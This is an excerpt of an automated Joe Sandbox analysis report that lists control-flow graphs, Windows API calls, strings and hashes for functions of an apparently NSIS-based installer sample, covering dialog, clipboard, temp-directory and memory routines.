5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                              Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                                                • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                              • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                              • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                                              • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                                              • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                                                                                                                                                                                                              Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                                • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                                              • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                                              • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                                              • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                                              • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                                                                                                                                                              Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                              • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                                                                                                                                • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_hyf04rot.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                              • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                              • API String ID: 3581403547-784952888
                                                                                                                                                                                                                                                                                              • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                                              • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                                                                                                                                                              Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                              control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.2119498105.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119483394.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119552487.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.000000000042B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.0000000000497000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119567114.00000000004B7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                              • Associated: 00000005.00000002.2119755965.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File
